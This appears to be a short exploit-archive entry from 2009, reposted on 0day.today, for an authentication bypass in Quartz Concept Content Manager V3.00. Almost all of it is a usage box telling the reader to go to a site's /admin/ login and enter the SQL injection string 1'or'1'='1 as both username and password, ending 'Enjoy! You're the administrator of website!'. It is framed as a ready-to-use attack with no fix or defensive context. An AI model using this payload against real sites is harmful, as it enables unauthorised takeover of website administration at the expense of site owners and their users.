id: 10250
date: 12/14/2009
title: Quartz Concept Content Manager V3.00 Auth Bypass
author: Mr.aFiR
cves: 

================================================
Quartz Concept Content Manager V3.00 Auth Bypass
================================================

#####################################################################
##                      * How to use it ?                          ##
##                      -----------------                          ##
## ~ Go to : > http://site/admin/                                  ##
##           > Login : Username = 1'or'1'='1                       ##
##                     Password = 1'or'1'='1                       ##
##                                                                 ##
##           > Enjoy! You're the administrator of website !        ##
##                                                                 ##
#####################################################################



#  0day.today [2023-03-24]  #